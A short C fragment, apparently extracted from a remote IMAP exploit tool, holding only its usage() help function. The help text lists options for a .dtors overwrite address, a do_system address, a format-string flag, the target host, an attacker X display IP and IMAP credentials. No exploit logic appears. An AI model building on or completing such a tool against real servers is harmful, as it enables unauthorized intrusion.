
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 char* DTOR_END_ADDR ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int stdout ;

void usage(char *arg0){
 fprintf(stdout," Usage: %s -options arguments\n\n",arg0);

 fprintf(stdout,"\t-r [retloc]    - .dtors address (default: %p).\n",DTOR_END_ADDR);
 fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n");
 fprintf(stdout,"\t-h [host]      - target hostname or ip.\n");
 fprintf(stdout,"\t-p [port]      - target port number (auto).\n");
 fprintf(stdout,"\t-f [sflag]     - $-flag number (default: 11).\n");
 fprintf(stdout,"\t-i [ip]        - attacker xhost ip.\n");
 fprintf(stdout,"\t-u [user]      - imap user id.\n");
 fprintf(stdout,"\t-s [pass]      - imap user pass.\n");
 fprintf(stdout,"\t-?             - help information.\n\n");

 fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0);
 exit(-1);
}
